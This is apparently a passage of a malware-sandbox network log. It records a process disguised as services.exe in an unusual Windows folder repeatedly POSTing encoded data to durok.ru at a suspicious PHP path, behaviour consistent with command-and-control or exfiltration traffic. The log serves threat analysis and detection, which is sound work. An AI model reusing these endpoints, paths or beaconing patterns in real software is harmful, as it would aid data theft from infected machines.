                                                                                                                              Data Ascii: YY[\TY\Q^XRTVYXST][[VPSTPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT'<1\+%W6"<X,**$%0$7<$P"<"[:9<?,>%"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:50.192792892 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:50.446396112 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1hNRFB6W5fCnX%2FbCDojN7e3PFZGpBV%2B8rqF3gNIhVuTmvuKF7VCpB41Xh%2Btr80fVRDWoao4ecOZXpOgIrUp%2BPgZ4XCCGSaI7%2FeRZOjaFUF0Awp3YsHFWn5PvA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f826396acb119cf-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6773&min_rtt=1806&rtt_var=10612&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2843&delivery_rate=35142&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              94 | 192.168.2.4 | 49941 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:49.658101082 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2100
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:50.005574942 CET | 2100 | OUT | Data Raw: 59 5d 5e 58 54 5e 59 51 5e 58 52 54 56 5b 58 50 54 51 5b 5a 56 51 53 59 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: Y]^XT^YQ^XRTV[XPTQ[ZVQSYPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT')"(]<*!Q"1 Z/>:*'!$4$ ,99??8_=5"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:50.839406967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:51.093485117 CET | 948 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:50 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=koM12K%2Bb69HK1kD4DqNpchyvYixEV1fgk618q%2FMm%2FPpZKYoCzZWsNoh8FbmkB1siL1msRVfh8fGpzYLrWecohJCXn7nSApSlexd6AQBCU5VJH42BYxW%2BckR6UQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f82639abd4232f4-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=7928&min_rtt=1844&rtt_var=12860&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2407&delivery_rate=28900&cwnd=111&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 39 38 0d 0a 0f 11 24 10 2a 29 3c 0e 22 3c 20 51 28 13 26 57 3e 0f 29 1a 2b 1c 03 15 29 3c 26 57 3c 38 0d 51 21 3a 35 02 3e 04 3c 1e 31 50 3a 10 32 1b 2e 5c 05 1d 27 5e 3c 28 3c 10 30 31 32 00 2a 2e 3a 40 29 3d 25 17 24 11 0e 03 37 15 2a 5d 23 08 23 02 2c 3c 2b 06 3a 02 30 5e 28 1e 2e 5a 22 3d 21 51 0c 1f 38 57 36 39 02 07 25 3d 22 0c 36 30 11 51 27 28 04 55 35 05 23 56 26 2a 3f 59 26 0d 0d 53 20 2d 0d 52 2b 3d 2a 5e 31 06 26 04 2a 29 25 5e 2d 02 23 54 03 3e 54 56 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 98$*)<"< Q(&W>)+)<&W<8Q!:5><1P:2.\'^<(<012*.:@)=%$7*]##,<+:0^(.Z"=!Q8W69%="60Q'(U5#V&*?Y&S -R+=*^1&*)%^-#T>TV0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              95 | 192.168.2.4 | 49944 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:50.685636997 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:51.036808968 CET | 2548 | OUT | Data Raw: 59 58 5b 5a 51 5b 59 53 5e 58 52 54 56 5e 58 56 54 5c 5b 5e 56 50 53 5c 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YX[ZQ[YS^XRTV^XVT\[^VPS\PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$^)!<]()"?/5U>>Y$'$ Z?",_-)?(>5"Z.#Z*
                                                                                                                              Dec 26, 2024 17:18:51.863084078 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:52.117490053 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:51 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iThPR42u4KffZo%2F%2FjAb4Qdt8lgOmv%2Bk6l7a6M8zG7LNRPgdsIBhrPU45x9fm9dmTywR771zf%2FseRbrQaoScY%2FfOZUSC0mUlRZV3frbxTThm7f%2BdOPmME76UdUQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263a1198243a3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6782&min_rtt=1718&rtt_var=10772&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=34570&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              96 | 192.168.2.4 | 49948 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Dec 26, 2024 17:18:52.038904905 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
                                                                                                                              Dec 26, 2024 17:18:52.404848099 CET | 2128 | OUT | Data Raw: 59 59 5e 5d 54 54 59 5a 5e 58 52 54 56 5b 58 5b 54 55 5b 55 56 5e 53 5b 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YY^]TTYZ^XRTV[X[TU[UV^S[PZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$( (:>51'8%=43<7 Z=.<> ])"Z.#Z*.
                                                                                                                              Dec 26, 2024 17:18:53.195504904 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                              Dec 26, 2024 17:18:53.473581076 CET | 947 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3RHPeLIfyctofJskexqyvgnPT9xd6otO1Cy3%2FwQ%2BP3yjehMB8LvWCfMXP6DE%2BJvuFQVJW%2FlJsbbJSRD3FUpD5pzLhVClo7UxlB09vTxGGG6lIY8v8Ku1ppo0bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263a96a5e78e1-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4737&min_rtt=2192&rtt_var=5913&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=64727&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 49949 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:52.578778982 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:52.927421093 CET | 2548 | OUT |
Dec 26, 2024 17:18:53.755889893 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:54.013592005 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:53 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=efu46mABUtBvkl5pfpKXnjFrvXQ1xQzNura4Dp1827lwrdevJvJsBnyymRbzUrrMrCgGJHkvyTJX%2BvWw%2By%2BpRse19wMx8r20rf8xYzkouMHfB9tiwSd0rltK5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263acefdb4316-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=8498&min_rtt=1721&rtt_var=14201&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=26097&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 49954 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:54.261763096 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:54.615606070 CET | 2548 | OUT |
Dec 26, 2024 17:18:55.439224958 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:55.711705923 CET | 797 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TwARsYtLvQaUUKHsgfV%2BvQZqpvxc72ljFDrqpisWAbrydUyc9ct%2Bc1gZ7rbNJaV7Oge3Sks061MzqFvkplq8A7Rns%2FDNZgEtgPlFZDMZKMexyZOxqosO3kfYeA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263b77ec38cc3-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=3232&min_rtt=1827&rtt_var=3496&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=111706&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 49955 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:54.376370907 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2116
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:54.724273920 CET | 2116 | OUT |
Dec 26, 2024 17:18:55.569037914 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:55.821434021 CET | 942 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:55 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LTlIGtQKDdl04qQ5eFZ6MPhgNOHJdDZYNobO0LyVbS4q1KonA6UeUfCl40OpABw6nLxBvV5afOcQGbWsUF6ldFHhwlswpkL4KF4ghDOfe7mnY%2By2yjYtWXbqcg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263b84df6de99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=6388&min_rtt=1687&rtt_var=10035&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2423&delivery_rate=37152&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Dec 26, 2024 17:18:55.830271006 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:56.163384914 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:56.165584087 CET | 2548 | OUT |
Dec 26, 2024 17:18:56.649712086 CET | 799 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:56 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kEqPemj%2BAzBRCF54r3Gxy0mNkCweoVbhdKrDgTdshbrPNgd0U2UzR7jPMN20bsvkadpUEBaQ5MA3Qrno8AqYvFv9zrYTKPbyl6DGKi%2BuYxfpajJrAtJwHD7Dzw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263bbfa2dde99-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=9901&min_rtt=1600&rtt_var=14754&sent=9&recv=13&lost=0&retrans=0&sent_bytes=992&recv_bytes=5278&delivery_rate=1795817&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 49960 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:56.690002918 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2128
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:57.036798000 CET | 2128 | OUT |
Dec 26, 2024 17:18:57.867057085 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:58.146224976 CET | 945 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:57 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Vg4ocqHNdvL7jyd5IkjEXXDPGoU4t943vjqYRsXU3SMuVJ0YmwY4bdYSVa%2FMWCnJ7tpOv9ZTK3la9yznC%2FFsWc3YJNsFYkNT1czwOcsLEEO1AoLQipYpfGnWiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263c6a88e6a5e-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=10198&min_rtt=1619&rtt_var=17766&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2435&delivery_rate=20780&cwnd=185&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 49961 | 104.21.93.162 | 80 | 2308 | C:\Windows\GameBarPresenceWriter\services.exe
Timestamp | Bytes transferred | Direction | Data
Dec 26, 2024 17:18:56.887049913 CET | 307 | OUT | POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2544
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:57.240035057 CET | 2544 | OUT |
Dec 26, 2024 17:18:58.067847013 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 26, 2024 17:18:58.325517893 CET | 796 | IN | HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:58 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d7YRFVLRHZsEkbH6UTqFl6spW5bYpbeam%2Bd9XG39%2BsctsJIPTeXyl%2FDwGDrtEUfy4cyAwlTx1lZEY2ekQtk5YzJxC5L96R1071Lg24rF4dgAKSg8j2kPWuuBJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263c7e9394276-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4504&min_rtt=1595&rtt_var=6417&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2851&delivery_rate=58700&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
102         192.168.2.4  49966        104.21.93.162   80                2308  C:\Windows\GameBarPresenceWriter\services.exe
Timestamp                            Bytes transferred  Direction  Data
Dec 26, 2024 17:18:58.563220024 CET  307                OUT        POST /JavascriptPacketgeoserverWindowsFlowerwordpresswpCentral.php HTTP/1.1
                                                                                                                              Content-Type: application/octet-stream
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                                              Host: durok.ru
                                                                                                                              Content-Length: 2548
                                                                                                                              Expect: 100-continue
Dec 26, 2024 17:18:58.911910057 CET  2548               OUT        Data Raw: 59 50 5e 5b 51 5b 5c 56 5e 58 52 54 56 5f 58 5a 54 50 5b 5e 56 54 53 58 50 5a 5d 56 56 59 55 5a 5d 5b 55 5a 54 5b 5f 5d 5b 57 55 5d 58 56 54 58 53 51 58 5c 42 5a 5a 5d 5a 53 52 5e 57 5f 5d 40 51 5b 43 5e 59 5e 50 5a 5d 5a 5c 5b 5e 50 5e 5c 57 59
                                                                                                                              Data Ascii: YP^[Q[\V^XRTV_XZTP[^VTSXPZ]VVYUZ][UZT[_][WU]XVTXSQX\BZZ]ZSR^W_]@Q[C^Y^PZ]Z\[^P^\WYSXP]V_VPX\_Z[__RGT_U\_[_ZU\PDQ^XP^_ZXWZZ\_[^XS^[\UVQ]^]X_\R[ZZR^ZYSWWSF]APZRWTYZXV[]VXS][YXUUVX]]Y_[ZT$Z?3<%5+8*4!%$[#<P ,X-3+ ,\*5"Z.#Z*>
Dec 26, 2024 17:18:59.740767002 CET  25                 IN         HTTP/1.1 100 Continue
Dec 26, 2024 17:19:00.235456944 CET  796                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:59 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvx3byKaAiyAGfzIpqTV150ADrnusBF8Xrn221WUA9G3RvYlqYTxhrcjqO8UViAXCWh4qu7aadHGu%2Fbs0JOVrMdQk8X8ggOs%2Fg%2F1a4UNHwhLJ3OoFWfVzsX2XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263d25c5c0f37-EWR
                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=4501&min_rtt=1735&rtt_var=6184&sent=4&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2855&delivery_rate=61167&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                              Data Raw: 34 0d 0a 3d 59 5d 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                              Data Ascii: 4=Y]T0
Dec 26, 2024 17:19:00.235574961 CET  796                IN         HTTP/1.1 200 OK
                                                                                                                              Date: Thu, 26 Dec 2024 16:18:59 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: keep-alive
                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bvx3byKaAiyAGfzIpqTV150ADrnusBF8Xrn221WUA9G3RvYlqYTxhrcjqO8UViAXCWh4qu7aadHGu%2Fbs0JOVrMdQk8X8ggOs%2Fg%2F1a4UNHwhLJ3OoFWfVzsX2XQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8f8263d25c5c0f37-EWR
